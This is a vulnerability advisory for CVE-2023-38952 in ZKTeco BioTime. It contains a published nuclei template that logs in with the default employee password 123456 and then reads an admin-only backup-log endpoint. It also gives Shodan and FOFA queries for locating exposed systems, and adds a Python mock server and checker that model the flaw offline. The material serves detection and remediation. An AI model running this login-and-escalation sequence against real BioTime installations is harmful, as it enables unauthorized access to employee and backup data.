CVE-2023-38952: ZKTeco BioTime <= 9.0.1 - Privilege Escalation

Date: 2026-01-08 | Affected software: ZKTeco BioTime | PoC: published

Vulnerability description

BioTime employee accounts are provisioned with the default password 123456, and the login form accepts it for the "employee" login type. Once a session exists, the server does not check the role bound to it, so a low-privilege employee session can call admin-only endpoints. The PoC below uses this to read /base/dbbackuplog/table/, which lists the database backup files, as proof that admin actions are reachable.

PoC code [published]

id: CVE-2023-38952

info:
  name: ZKTeco BioTime <= 9.0.1 - Privilege Escalation
  author: riteshs4hu
  severity: high
  description: |
    BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
  impact: |
    Unauthenticated attackers can access sensitive files and credentials, leading to data breach and potential system compromise.
  remediation: |
    Implement proper authentication and access controls for static file resources, and update to the latest version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38951
    - https://krashconsulting.com/fury-of-fingers-biotime-rce/
    - https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.3
    cve-id: CVE-2023-38952
    epss-score: 0.15537
    epss-percentile: 0.94449
    cwe-id: CWE-552
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:::::::*
  metadata:
    verified: true
    vendor: zkteco
    product: biotime
    max-request: 12
    shodan-query: http.html:"ZKTeco Security"
    fofa-query: body="ZKTeco Security"
  tags: cve,cve2023,biotime,zkteco,auth-bypass,priv-esc,vkev

http:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body
        regex:
          - "name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'"

  - raw:
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrf}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password=123456&captcha=&login_user=employee

    payloads:
      user:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
    attack: clusterbomb
    stop-at-first-match: true

  - raw:
      - |
        GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "db_type\":", "backup_file\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022100ba103e9c27b0c0d56138a296c3602dd0ce9894a4298d5f46155844577288e2ae0220700e732d45955c37acb128289f110cf7077ee7e82e2a8bd86806b24dc9f6c2dd:922c64590222798bb761d5b6d8e72950
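As an added example (not BioTime's code and not part of the template above), the following stdlib-only Python models the two defects the description names, so the check can be exercised offline: a mock BioTime-like app that issues a session to any employee logging in with the default password and, in vulnerable mode, serves the admin-only backup-log JSON to every session, beside the same app with the missing role check in place; and a checker that walks the same three steps as the template (fetch the CSRF token, try the default password for low numeric IDs, request the backup-log table with the resulting session). The paths, form fields, default password and the JSON keys the matcher looks for come from the template; the account list, token formats, response bodies and the mock's lack of Django CSRF cookie enforcement are constructed assumptions.

```python
"""Model of CVE-2023-38952 (added example, not BioTime's code): a mock
BioTime-like server plus a checker that follows the nuclei template's
three requests. Endpoint paths, form fields and the default password 123456
are from the template; accounts, tokens and response bodies are constructed."""
import json
import re
import secrets
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import HTTPCookieProcessor, Request, build_opener

DEFAULT_PASSWORD = "123456"
# Constructed accounts: employee "2" still has the provisioning default,
# employee "1" changed it, and the admin uses a random password.
ACCOUNTS = {"1": ("S3cure!pw", "employee"),
            "2": (DEFAULT_PASSWORD, "employee"),
            "admin": (secrets.token_hex(8), "admin")}
LOGIN_PAGE = "<form><input name='csrfmiddlewaretoken' value='%s'></form>"


class BioTimeMock(BaseHTTPRequestHandler):
    """Minimal stand-in for the login form and the admin backup-log table."""

    def log_message(self, *args):  # keep the example quiet
        pass

    def _send(self, status, body, ctype="application/json", cookie=None):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        if cookie:
            self.send_header("Set-Cookie", cookie)
        self.end_headers()
        self.wfile.write(data)

    def _session_role(self):
        jar = SimpleCookie(self.headers.get("Cookie", ""))
        sid = jar["sessionid"].value if "sessionid" in jar else None
        return self.server.sessions.get(sid)

    def do_GET(self):
        if self.path == "/login/":
            self._send(200, LOGIN_PAGE % secrets.token_hex(32), "text/html")
        elif self.path.startswith("/base/dbbackuplog/table/"):
            role = self._session_role()
            if role is None:
                self._send(401, '{"detail": "login required"}')
            elif role != "admin" and not self.server.vulnerable:
                # The role check the vulnerable build lacks.
                self._send(403, '{"detail": "admin only"}')
            else:
                self._send(200, json.dumps({"data": [{
                    "db_type": "mysql",
                    "backup_file": "/backups/biotime_2024.sql"}]}))
        else:
            self._send(404, "{}")

    def do_POST(self):
        # Login: any account whose stored password matches gets a session
        # keyed to its role. Django's CSRF cookie pairing is not modelled.
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        want = ACCOUNTS.get(user)
        if self.path != "/login/" or not want or \
                want[0] != form.get("password", [""])[0]:
            self._send(401, '{"detail": "bad credentials"}')
            return
        sid = secrets.token_hex(16)
        self.server.sessions[sid] = want[1]
        self._send(200, '{"detail": "ok"}', cookie="sessionid=%s; Path=/" % sid)


def start_mock(vulnerable):
    """Serve the mock on a free loopback port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), BioTimeMock)
    srv.sessions, srv.vulnerable = {}, vulnerable
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


CSRF_RE = re.compile(r"name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'")


def check_default_employee_login(base_url, user_ids=range(1, 11)):
    """Template steps 1-3. Reports which low numeric employee ID accepts the
    default password and whether that session can read the admin backup log."""
    result = {"default_password_user": None, "admin_data_readable": False}
    opener = build_opener(HTTPCookieProcessor())  # session cookie reuse
    with opener.open(base_url + "/login/") as r:
        csrf = CSRF_RE.search(r.read().decode()).group(1)
    for uid in user_ids:
        body = urlencode({"username": uid, "password": DEFAULT_PASSWORD,
                          "captcha": "", "login_user": "employee"}).encode()
        req = Request(base_url + "/login/", data=body, headers={
            "X-CSRFToken": csrf,
            "Content-Type": "application/x-www-form-urlencoded"})
        try:
            opener.open(req).close()
        except HTTPError:
            continue  # this ID does not use the default password
        result["default_password_user"] = uid
        break  # stop-at-first-match
    req = Request(base_url + "/base/dbbackuplog/table/?page=1&limit=1",
                  headers={"Accept": "application/json"})
    try:
        with opener.open(req) as r:
            body = r.read().decode()
            result["admin_data_readable"] = (
                "application/json" in r.headers.get("Content-Type", "")
                and '"db_type":' in body and '"backup_file":' in body)
    except HTTPError:
        pass  # 401 without a session, 403 when the role check holds
    return result


if __name__ == "__main__":
    for mode in (True, False):
        srv, url = start_mock(vulnerable=mode)
        print("vulnerable build" if mode else "patched build",
              check_default_employee_login(url))
        srv.shutdown()
```

Running the patched build shows why the remediation line in the template is only half the fix: with the role check restored the backup log is no longer readable, but the default-password employee still logs in, so forcing a password change at first login (or rejecting 123456 at provisioning) is needed alongside the authorization fix.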
